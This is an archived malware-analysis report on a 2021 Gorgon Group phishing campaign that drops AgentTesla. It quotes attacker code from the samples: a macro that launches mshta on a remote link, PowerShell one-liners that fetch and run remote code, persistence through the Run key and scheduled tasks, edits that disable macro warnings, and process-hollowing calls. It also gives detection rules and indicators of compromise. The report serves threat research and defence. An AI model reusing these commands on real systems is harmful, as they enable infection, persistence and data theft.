{
	"id": "27bad4ff-7444-4977-a1bb-c8ba071907d5",
	"created_at": "2026-04-06T00:14:52.3312Z",
	"updated_at": "2026-04-10T13:11:39.144035Z",
	"deleted_at": null,
	"sha1_hash": "9e26b1f609bf14e037b4913faf1a26abd52850d1",
	"title": "2021 Gorgon Group APT Operation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7763780,
	"plain_text": "2021 Gorgon Group APT Operation\r\nPublished: 2022-01-12 · Archived: 2026-04-05 13:24:53 UTC\r\nThis article unveils the last 2021 Gorgon Group campaign, including the technical details regarding the infection chain and the various multi-stage payloads, its C\u0026C architecture, a tracking of the infected computers across the study, and finally, a way to automate the tracking of the campaign and the payload extraction.\r\nAll of the IOCs are available here.\r\nSummary\r\nTL;DR\r\nStage 0 : Downloader Macro\r\nStage 1 : JS / Powershell Downloader\r\nStage 2 : Injector wrapper\r\nStage 3 : The Alosh/3losh Injector case\r\nStage 4 : AgentTesla Final Payload\r\nAutomation\r\nIOCs\r\nBlogspots URL (stage 1)\r\nUsrFiles URL (stage 2)\r\nC\u0026C Lists\r\nYARA Rules\r\nTL;DR\r\nThis late 2021 campaign leverages an in-memory infection chain to drop the AgentTesla malware on the infected computer, initiated by phishing emails.\r\nhttps://guillaumeorlando.github.io/GorgonInfectionchain\r\nPage 1 of 19\r\nThe infection chain uses a modular architecture, based on legitimate online services (“blogspot.com” pages and “usrfiles.com”) that respectively serve some JS/PowerShell commands and a process hollowing tool.\r\nA final AgentTesla v3 payload is then injected in the memory of a legitimate process on the infected computer.\r\nAt least half of the infected computers are Indonesian or related to the Indonesian industry. Through a misconfiguration on the C\u0026C servers, we can observe the evolution of the “botnet” and track the infected computers.\r\nA lot of them are in critical companies, related to various areas:\r\nThe whole infection chain can be summarized by this diagram:\r\nEach step of the infection chain will be described in the following chapters.\r\nStage 0 : Downloader Macro\r\nFrom the batch of analyzed phishing e-mails from this campaign, it seems that most of them are leveraging the auto_open() VBA function to execute some arbitrary code when they are opened with the macros enabled.\r\nThe VBA script in the malicious macro is not sophisticated nor obfuscated. Its goal is to load a remote JavaScript snippet through the “Mshta.exe” legitimate binary.\r\nHere is an example of such a VBA macro that can be found in this campaign:\r\nEnum myenum\r\n myname1 = 1\r\n myname2 = 2\r\n myname3 = 3\r\n myname4 = 4\r\nEnd Enum\r\n \r\nPublic Function getEnumName(eValue As myenum)\r\nSelect Case eValue\r\n Case 1\r\n getEnumName = \"mshta\"\r\n Case 2\r\n getEnumName = \"http://www.bitly.com/doaksodksueasdweu\"\r\n End Select\r\nEnd Function\r\nPublic Function calc()\r\n Set calc = GetObject(StrReverse(\"000045355444-E94A-EC11-972C-02690731:wen\"))\r\nEnd Function\r\nSub auto_open()\r\n Dim Total As New clean\r\n Dim NamakTotal, lora As String\r\n NamakTotal = Total.getEnumName(1)\r\n lora = Total.getEnumName(2)\r\n koko = lora\r\n Total. calc. ShellExecute NamakTotal, koko\r\nEnd Sub\r\nThe shortened “bitly.com” link points to a blogspot page made by the attacker, which looks empty at first glance:\r\nStage 1 : JS / Powershell Downloader\r\nBy taking a deeper look at the JavaScript embedded in the blogspot page, we can spot the fact that this page contains a script that is supposed to be run remotely by the mshta instance from the previous stage.\r\nDepending on the analyzed page, or even on the time when this operation was monitored, the scripts embedded in the various webpages may change.\r\nThis allows the operator to update the victims without the need to re-infect them or to re-compile its payloads.\r\nA total of 97 malicious active blogspot pages were identified and dumped. These pages do not always share the same scripts. This repository contains a copy of the dumps made during the monitoring of this campaign.\r\nFor instance, some scripts were very small and straightforward, loading the next stage without doing much more.\r\nSome others were adding an intermediary persistence mechanism. For instance, this variant is adding an entry in the “Run” registry key to make this stage 1 payload survive a reboot:\r\npink = \"pOwersHelL.exe -w h i'E'x(iwr('\u003curl\u003e') -useB);i'E'x(iwr(\u003curl\u003e') -useB);i'E'x(iwr('\u003curl\u003e') -useB);\"\r\nConst tpok = \u0026H80000001\r\nlopaskkk = \".\"\r\nSet kasodkmwm = GetObject(\"winmgmts:\\\\\" \u0026 lopaskkk \u0026 \"\\root\\default:StdRegProv\")\r\npoloaosd = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\nakosdwdjdw = \"care\"\r\nkasodkmwm.SetStringValue tpok, poloaosd, akosdwdjdw, pink\r\nIn the same fashion, this other one is setting up a scheduled task:\r\nfunction MainAccess1()\r\nMegacall \"schtas\", \"k\" , \"s /crea\",\"te /sc MINUTE /mo 80 /tn \"\"\"\"Bluefibonashi\"\"\"\" /\" , \"F /tr \"\"\"\"\\\"\"\"\"M\" , \"s\r\nEnd function\r\nSome other versions of these scripts were spotted cleaning up the stage 0 parent processes and disabling the macro warning messages:\r\nMicrosoftWINdows.Run \"taskkill /f /im winword.exe\", 0\r\nMicrosoftWINdows.Run \"taskkill /f /im Excel.exe\", 0\r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings\", 1, \"REG_DWORD\"\r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\VBAWarnings\", 1, \"REG_DWORD\"\r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\VBAWarnings\", 1, \"REG_DWORD\"\r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\VBAWarnings\", 1, \"REG_DWORD\"\r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\VBAWarnings\", 1, \"REG_DWORD\"\r\nThis shows that the payloads are not homogeneous, even if they share the same objective: loading the next stage from another remote website.\r\nAs for the previous snippets, the part where the next stage is loaded is an obfuscated PowerShell command:\r\nakosdwdjdw = \"takeCare\"\r\nSubQueryPath akosdwdjdw,\"pOweRshell.exe -w h I`E`X([System.IO.Strea\"+\"mReader]::new( [System.Net.WebRequest]\"+\":\r\nThis command gave us the next stage payload location: the “usrfiles.com” platform.\r\nA list of the monitored “usrfiles.com” links can be found in the last part of this document.\r\nA total of 101 malicious “usrfiles.com” pages were monitored for this analysis.\r\nAt this point of the infection, everything is fileless, as the payloads are never written to the infected computer's disk, making it harder for monitoring tools to detect the infection.\r\nStage 2 : Injector wrapper\r\nDepending on the monitored blogspot / usrfiles endpoint, several payloads can be found.\r\nThey usually share the same goal: loading the next stage in memory using PowerShell.\r\nSome lightweight PowerShell obfuscation methods are used.\r\nFor instance, in this first variant, the strings are built character by character, and the compiled injector binary and the final payload are respectively stored as a PowerShell byte array and a compressed ZIP byte array:\r\n[Byte[]] $ALOSH = @(31,139,8,0,0,0,0,0,4,0,237,189,7,96,28,73,150,37,38,47,109,202, [...])\r\n[...]\r\n[Byte[]] $Bytes = Decompress(@(31,139,8,0,0,0,0,0,4,0,204,189,9,152,92,69,181,56,126, [...])\r\n[...]\r\n$nan = \"R\"+\"e\"+\"g\"+\"A\"+\"s\"+\"m\"+\".\"+\"e\"+\"x\"+\"e\"\r\n[...]\r\n[Object[]] $Params=@($MyPt.Replace(\"F\"+\"r\"+\"a\"+\"m\"+\"e\"+\"w\"+\"or\"+\"k\"+\"6\"+\"4\",\"F\"+\"r\"+\"a\"+\"mew\"+\"o\"+\"r\"+\"k\") ,$Byt\r\nSome versions are embedding the final payload as a non-compressed byte array.\r\nAnother variant is compiling the target DLL (final stage) at runtime:\r\n$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)\r\n$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters\r\n$v1 = \"Sys@@@\".Replace(\"@@@\",\"tem.dll\")\r\n$CompilerParametres.ReferencedAssemblies.Add($v1)\r\n$CompilerParametres.ReferencedAssemblies.Add(\"System.!@!$^^%^%**\u0026*\u0026*$$%$%$\".Replace(\"!@!$^^%^%**\u0026*\u0026*$$%$%$\",\"Man\r\n$CompilerParametres.ReferencedAssemblies.Add(\"System.Windows.Forms.dll\")\r\n$CompilerParametres.ReferencedAssemblies.Add(\"mscorlib.dll\")\r\n$CompilerParametres.ReferencedAssemblies.Add(\"Microsoft.VisualBasic.dll\")\r\n$CompilerParametres.IncludeDebugInformation = $false\r\n$CompilerParametres.GenerateExecutable = $false\r\n$CompilerParametres.GenerateInMemory = $true\r\n$CompilerParametres.CompilerOptions += \"/platform:X86 /unsafe /target:library\"\r\nFinally, some variants are adding a quick persistence mechanism using the “Startup” folder while doing some antivirus detection:\r\nMove-Item -Path \"C:\\Users\\Public\\Micropoft.vbs\" -Destination \"C:\\Users\\$env:UserName\\AppData\\Roaming\\Microsoft\\\r\n[...]\r\nif([System.IO.File]::Exists(\"C:\\Program Files\\ESET\\ESET Security\\ecmds.exe\")){\r\n [...]\r\n}\r\nelseif([System.IO.File]::Exists(\"C:\\Program Files\\Common Files\\McAfee\\Platform\\McUICnt.exe\")){\r\n [...]\r\n}\r\nelseif([System.IO.File]::Exists(\"C:\\Program Files\\Avast Software\\Avast\\AvastUI.exe\")){\r\n [...]\r\n}\r\nThese injectors are signed by the “Alosh/3losh RAT” author.\r\nStage 3 : The Alosh/3losh Injector case\r\nThe next stage of the infection chain seems to leverage the same compiled injector file every time, even if the injected content (the final payload) is not always the same.\r\nA dozen infection chains were related to the injector with the following hash:\r\n404afe734de0bd19d2a25f85f28c860d\r\nI’ve made a YARA rule to detect more of those injectors in the wild:\r\nrule Alosh_Process_Hollowing_Mana_Campaign {\r\n meta:\r\n author = \"HomardBoy\"\r\n description = \"Alosh RAT process hollowing program linked to the 2021 Gorgon Group APT\"\r\n strings:\r\n $str1 = \"alosh\" ascii\r\n $str2 = \"projFUD\" ascii\r\n $str3 = \"ZwUnmapViewOfSec\" ascii\r\n $str4 = \"ResumeThread\" ascii\r\n $str5 = \"WriteProcessMem\" ascii\r\n $str6 = \"VirtualAll\" ascii\r\n $str7 = \"CreateProc\" ascii\r\n condition:\r\n (uint16(0) == 0x5a4d and all of ($str*))\r\n}\r\nThis injector is not that new, and was already linked to previous Gorgon Group campaigns [5].\r\nThis tool is heavily advertised on social media, along with some other packers/exploits. The YouTube channel named “3loshrat” shows a demonstration of how to use the injector, and its configuration options:\r\nThe attentive reader will notice the presence of the “jsc.exe” available target in this screenshot, which is the same as the hardcoded injection target in the downloader wrapper from stage 2.\r\nThe injector is advertised on many social media by the “3loshRAT” account:\r\nhttps://www[.]instagram.com/3losh.rat\r\nhttps://website[.]informer.cosh-rat.com\r\nhttps://twitter[.]com/ali_fares11\r\nhttps://www[.]youtube.com/c/3loshrat/videos\r\nThose social media accounts are advertising various “Alosh/3losh RAT” products, while the YouTube channel provides some demonstrations of the actual tools.\r\n\"crypter . powershell . vb . c# for sale all programs\"\r\nA GitHub account with the same name and the same profile picture can also be found:\r\nRegarding the actual injector itself:\r\nThe original name of this compiled DLL is straightforward: “runpe.dll”.\r\nThis binary, which is written in .NET, is linked to the Alosh/3losh RAT product through its file descriptions:\r\n[assembly: AssemblyCopyright(\"Copyright © 2022\")]\r\n[assembly: AssemblyTitle(\"3lostrat\")]\r\n[...]\r\n[assembly: AssemblyDescription(\"3lostrat\")]\r\n[assembly: AssemblyProduct(\"3lostrat\")]\r\n[assembly: AssemblyCompany(\"3lostrat\")]\r\nThe author of this piece of code saw far ahead for the copyright date of this sample, which indicates that this injector is still in its early life.\r\nThe goal of the binary is to inject an arbitrary binary, using a process hollowing technique (given by the second argument to the injector), in the process space named after the first given argument.\r\nAlmost all the stage 2 wrapper scripts were using the hardcoded target process name “C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe” to inject the next stage into it.\r\nThis simple injector can be summarized to the following code:\r\n[...]\r\nalosh_rat.CreateProcessA(arg2_path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 134217732U, IntPtr.Zero, null\r\n[...]\r\nalosh_rat.ZwUnmapViewOfSection(alosh_rat.ZwUnmapViewOfSection, processInformation.ProcessHandle, num11\r\n[...]\r\nalosh_rat.WriteProcessMemory(processInformation.ProcessHandle, num9 + num7, arg1_buffer, array2.Length, ref num5\r\n[...]\r\nalosh_rat.ResumeThread(alosh_rat.ResumeThread, processInformation.ThreadHandle)]\r\n[...]\r\nThis code, which follows the standard Process Hollowing technique, seems inspired from this repository: “https://github.com/NYAN-x-CAT/CSharp-RunPE/blob/master/RunPE/RunPE.cs”, as it shares a lot of similarities with the Alosh / 3losh version (minus the execution flow scrambling using some basic opaque predicates).\r\nThe injected payload (which is the final one of the infection chain) is a customized AgentTesla v3 malware.\r\nStage 4 : AgentTesla Final Payload\r\nThe final payload is a customized version of the AgentTesla malware. It will periodically take screenshots of the infected computer's screen, act as a keylogger when receiving a special order, and steal the victim’s browser cookies and passwords.\r\nThe detailed technical analysis of this AgentTesla version is available here.\r\nC2 Infrastructure\r\nThe login page of the command and control servers is a really unique one:\r\nThis login page is almost the same as the legacy AgentTesla one, with a custom background and some reference to the “Mana” string.\r\nThis “Mana” string, the logo and the custom background allow linking this panel to the Gorgon Group APT [4], as they seem to keep this login page across campaigns [1].\r\nUnit 42’s researchers linked this characteristic panel to the “Aggah” threat actor, which is associated with the Gorgon Group APT.\r\nThe late 2019/early 2021 campaigns were leveraging the same panel, but with the label “version 3”, and were attributed to the GorgonGroup/Hagga APT by various researchers [2] [3].\r\nEach server holds a list of 30 panels on average. They all share the same URL format between servers. The root directory is identified with a single letter: ‘/j’ or ‘/k’, for instance. Then a unique identifier is used to separate each panel: ‘/j/p1a’, ‘/j/p2b’, ‘/j/p3c’, …\r\nAlmost all of the monitored servers were misconfigured, resulting in an open directory at the web server’s root directory.\r\nThe “/files” directory is interesting, as it contains the stolen data from the victims.\r\nWith this access, it is possible to monitor the evolution of the number of victims over time:\r\nAs seen in the introduction, we can spot a lot of infected computers in some critical areas.\r\nThis one seems related to the tracking of credit card deliveries:\r\nThis one is an infected computer inside what seems to be a datacenter:\r\nHere is a medical tracking system:\r\nAnd here is another instance with a customs service platform related to the Indonesian government:\r\nMany more sensitive companies were infected, in a lot of different areas, along with some personal computers of citizens all around the world.\r\nSomething odd is the fact that one of the hosted panels stores a lot of infected computers from major Indonesian companies. From my observations, an average of 54% of the infected computers are Indonesian or related to Indonesian companies.\r\nAutomation\r\nIn order to build some hunting rules for the newer AgentTesla payload used in this campaign, a static configuration extractor was built in Python. It allows extracting the campaign ID of the compiled final payload, and its gate URL.\r\nThis script is available at https://github.com/GuillaumeOrlando/Daily-Malware-Analysis/tree/main/2021_11_12.\r\nIt allows tracking new panels with ease, or mapping new samples to existing panel endpoints:\r\npython3 AgentTesla_Static_conf_extractor.py /tmp/sample_1.dmp\r\ncampaign id : http://103.125.190.248/j/p14o/mawa/4d380a5d91252d890dc4.php\r\npanel : af2926ce207b2bc813c89d939aaa2b01138ddda63b46416647288d31a75bd226\r\nMD5 agentTesla : 57ef73ca8f0afbc260638c1dd668e4e4\r\npython3 AgentTesla_Static_conf_extractor.py /tmp/sample_2.dmp\r\ncampaign id : http://103.125.190.248/j/p19t/mawa/48608c2b91739edc3959.php\r\npanel : d322164f81cf3f5c5c576a12e60be6fb27e4cc2e72085f500be81fda18272486\r\nMD5 agentTesla : c004124914c09d28a9bd99806e58605a\r\npython3 AgentTesla_Static_conf_extractor.py /tmp/sample_3.dmp\r\ncampaign id : http://103.125.190.248/j/p15p/mawa/e483d6564638acbf4559.php\r\npanel : 520585c44a0f6fbdbaaf7c43b8291f9421b2d1006eedfcbfbf17e7e60ff87abc\r\nMD5 agentTesla : b354a9e859952e1fcb1f2e27650ec5c9\r\npython3 AgentTesla_Static_conf_extractor.py /tmp/sample_4.dmp\r\ncampaign id : http://103.125.190.248/j/p17r/mawa/e6a2101b1d3a47e18c7f.php\r\npanel : b7e3573f18d53fb1647bf056583e3e284c2acb1b7f0a2f29592db8c80076d83e\r\nMD5 agentTesla : 4425f4efa71c8709a2666d4478f382ce\r\nIn order to gain access to those payloads, 3 additional scripts were created to automate the tracking of the actor's movements.\r\nThe first one is used to extract the stage 1 payload (JavaScript payload) for a set of given blogspot URLs:\r\npython3 blog_payload_extract.py\r\n[*] Processing https://thethingsidontknowwhattyodo.blogspot.com/p/reza.html\r\n[-] Site is inactive\r\n[*] Processing https://madarbloghogya.blogspot.com/p/rezaback.html\r\n[+] Saved under ./Export/2022-01-03/https:__madarbloghogya_blogspot_com_p_rezaback_html\r\n[...]\r\n[*] Processing http://gagamutakakachota.blogspot.com/p/14.html\r\n[+] Saved under ./Export/2022-01-03/gagamutakakachota_blogspot_com_p_14_html\r\n[*] Processing http://bukbukbukak.blogspot.com/p/10.html\r\n[+] Saved under ./Export/2022-01-03/bukbukbukak_blogspot_com_p_10_html\r\n[+] Saved under ./Export/2022-01-03/bukbukbukak_blogspot_com_p_10_html\r\n[...]\r\nPayloads:\r\n['https://deb43e46-145f-4ebd-abfb-69a78b67bacf.usrfiles.com/ugd/deb43e_dd2f1039bd3c48049b0fe8a43876696d.txt', 'h\r\n[...]\r\nPayload extract: ./Payloads/f0526bc7f32b879f170786e21061b425.dmp\r\nPayload extract: ./Payloads/c721fa5ee7d7eb8336baeaab72390b3f.dmp\r\n[...]\r\nPayload extract: ./Payloads/7fb91a9310a590dc4fc91f0183c3c5a9.dmp\r\nPayload extract: ./Payloads/8f6578c81e677eb963c7c8164c414ee3.dmp\r\nThese blogspot URLs can be retrieved with the help of this small VirusTotal graph that I made:\r\nWith those extracted stage 1 payloads and the extracted “usrfiles” URLs, we can now obtain the “3losh Injector” binary and the injected content with the help of another script that will simply download the stage 2 and 3 payloads.\r\nPayload extract: ./Payloads/loader_0/b1a471709f6fb58395e9c81a44f94bd7.dmp\r\nhttp://g92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_f1219abec862435b9069d453769c291d.txt\r\nPayload extract: ./Payloads/loader_0/f0b34ba48bf68057e6c5e68837141aab.dmp\r\nhttp://g92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_f2976cf0e0ad4d6d8330a9c3e0c8093c.txt\r\nPayload extract: ./Payloads/loader_0/b85fb5255a15d091277b8518d02500ce.dmp\r\nhttp://g92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_f33d5ba08a264a2fa73caaaf1c1aa89b.txt\r\nPayload extract: ./Payloads/loader_0/ddb91a90eed20724950c62d3e15a7a10.dmp\r\nhttp://g92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_fca89e4173af436497e274a5e70b6145.txt\r\nPayload extract: ./Payloads/loader_0/4ef90c180e81bb4c7834c0da5872092c.dmp\r\nhttp://gdeb43e46-145f-4ebd-abfb-69a78b67bacf.usrfiles.com/ugd/deb43e_dd2f1039bd3c48049b0fe8a43876696d.txt\r\nPayload extract: ./Payloads/loader_0/f0526bc7f32b879f170786e21061b425.dmp\r\n[...]\r\nFinally, the last script will parse the extracted payloads to retrieve the final AgentTesla payload, ready to be analyzed:\r\nProcessing: ./Payloads/loader_0/d6578c9f4802043a011ff44b79753636.dmp\r\n Alosh RAT type 1 (powershell Byte array version)\r\n new written to ./Payloads/loader_1/new_d6578c9f4802043a011ff44b79753636.dmp (MD5: 57ef73ca8f0afbc260638c1dd668\r\n H1 written to ./Payloads/loader_1/H1_d6578c9f4802043a011ff44b79753636.dmp (MD5: 404afe734de0bd19d2a25f85f28c86\r\n[...]\r\nProcessing: ./Payloads/loader_0/ddb91a90eed20724950c62d3e15a7a10.dmp\r\n Alosh RAT type 1 (powershell Byte array version)\r\n new written to ./Payloads/loader_1/new_ddb91a90eed20724950c62d3e15a7a10.dmp (MD5: c004124914c09d28a9bd99806e58\r\n H1 written to ./Payloads/loader_1/H1_ddb91a90eed20724950c62d3e15a7a10.dmp (MD5: 404afe734de0bd19d2a25f85f28c86\r\n Unknown payload, skiping ...\r\nProcessing: ./Payloads/loader_0/c86a89bfbb6695378fb207de8578d206.dmp\r\n Alosh RAT type 2 (C# version)\r\n 0_array written to ./Payloads/loader_1/0_array_c86a89bfbb6695378fb207de8578d206.dmp (MD5: 7a8213b118b2c50cb31a\r\n 1_array written to ./Payloads/loader_1/1_array_c86a89bfbb6695378fb207de8578d206.dmp (MD5: e9c6b40bc5e5c33b2f4c\r\nProcessing: ./Payloads/loader_0/4ef90c180e81bb4c7834c0da5872092c.dmp\r\n Alosh RAT type 2 (C# version)\r\n 0_array written to ./Payloads/loader_1/0_array_4ef90c180e81bb4c7834c0da5872092c.dmp (MD5: 7a8213b118b2c50cb31a\r\n 1_array written to ./Payloads/loader_1/1_array_4ef90c180e81bb4c7834c0da5872092c.dmp (MD5: eff0328870ecb6461aad\r\nIOCs\r\nThe full list of the IOCs observed during this analysis can be downloaded here. It covers the blogspot URLs (stage 1), the usrfiles URLs (stage 2), the AgentTesla payload hashes, the infection vector hashes (pptx, xls, docx) and the C2 servers and their gates.\r\nReferences\r\n[1] https://www.riskiq.com/blog/external-threat-management/mana-tools-malware-c2-panel/\r\n[2] https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/\r\n[3] https://apt.thaicert.or.th/cgi-bin/showcard.cgi?g=Aggah\r\n[4] https://apt.thaicert.or.th/cgi-bin/showcard.cgi?g=Gorgon%20Group\r\n[5] https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html\r\nSource: https://guillaumeorlando.github.io/GorgonInfectionchain",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://guillaumeorlando.github.io/GorgonInfectionchain"
	],
	"report_names": [
		"GorgonInfectionchain"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b0d34dd6-ee90-483b-bb6c-441332274160",
			"created_at": "2022-10-25T16:07:23.296754Z",
			"updated_at": "2026-04-10T02:00:04.526403Z",
			"deleted_at": null,
			"main_name": "Aggah",
			"aliases": [
				"Operation Red Deer",
				"Operation Roma225"
			],
			"source_name": "ETDA:Aggah",
			"tools": [
				"AgenTesla",
				"Agent Tesla",
				"AgentTesla",
				"Aggah",
				"Atros2.CKPN",
				"Bladabindi",
				"Jorik",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Negasteal",
				"Origin Logger",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"Warzone",
				"Warzone RAT",
				"ZPAQ",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "18278778-fa63-4a9a-8988-4d266b8c5c1a",
			"created_at": "2023-01-06T13:46:38.769816Z",
			"updated_at": "2026-04-10T02:00:03.094179Z",
			"deleted_at": null,
			"main_name": "The Gorgon Group",
			"aliases": [
				"Gorgon Group",
				"Subaat",
				"ATK92",
				"G0078",
				"Pasty Gemini"
			],
			"source_name": "MISPGALAXY:The Gorgon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "97fdaf9f-cae1-4ccc-abe2-76e5cbc0febd",
			"created_at": "2022-10-25T15:50:23.296989Z",
			"updated_at": "2026-04-10T02:00:05.347085Z",
			"deleted_at": null,
			"main_name": "Gorgon Group",
			"aliases": [
				"Gorgon Group"
			],
			"source_name": "MITRE:Gorgon Group",
			"tools": [
				"NanoCore",
				"QuasarRAT",
				"Remcos",
				"njRAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "6fbff48b-7a3e-4e54-ac22-b10f11e32337",
			"created_at": "2022-10-25T16:07:23.318008Z",
			"updated_at": "2026-04-10T02:00:04.539063Z",
			"deleted_at": null,
			"main_name": "APT 4",
			"aliases": [
				"APT 4",
				"Bronze Edison",
				"Maverick Panda",
				"Salmon Typhoo",
				"Sodium",
				"Sykipot",
				"TG-0623",
				"Wisp Team"
			],
			"source_name": "ETDA:APT 4",
			"tools": [
				"Getkys",
				"Sykipot",
				"Wkysol",
				"XMRig"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2",
			"created_at": "2023-06-20T02:02:10.254614Z",
			"updated_at": "2026-04-10T02:00:03.365336Z",
			"deleted_at": null,
			"main_name": "Hagga",
			"aliases": [
				"TH-157",
				"Aggah"
			],
			"source_name": "MISPGALAXY:Hagga",
			"tools": [
				"Agent Tesla"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6c4e4b91-1f98-49e2-90e6-435cea8d3d53",
			"created_at": "2022-10-25T16:07:23.693797Z",
			"updated_at": "2026-04-10T02:00:04.711987Z",
			"deleted_at": null,
			"main_name": "Gorgon Group",
			"aliases": [
				"ATK 92",
				"G0078",
				"Pasty Draco",
				"Subaat",
				"TAG-CR5"
			],
			"source_name": "ETDA:Gorgon Group",
			"tools": [
				"AgenTesla",
				"Agent Tesla",
				"AgentTesla",
				"Atros2.CKPN",
				"Bladabindi",
				"CinaRAT",
				"Crimson RAT",
				"ForeIT",
				"Jorik",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Loki",
				"Loki.Rat",
				"LokiBot",
				"LokiPWS",
				"MSIL",
				"MSIL/Crimson",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Negasteal",
				"NetWeird",
				"NetWire",
				"NetWire RAT",
				"NetWire RC",
				"NetWired RC",
				"Origin Logger",
				"Quasar RAT",
				"QuasarRAT",
				"Recam",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"SEEDOOR",
				"Scarimson",
				"Socmer",
				"Yggdrasil",
				"ZPAQ",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434492,
	"ts_updated_at": 1775826699,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9e26b1f609bf14e037b4913faf1a26abd52850d1.pdf",
		"text": "https://archive.orkl.eu/9e26b1f609bf14e037b4913faf1a26abd52850d1.txt",
		"img": "https://archive.orkl.eu/9e26b1f609bf14e037b4913faf1a26abd52850d1.jpg"
	}
}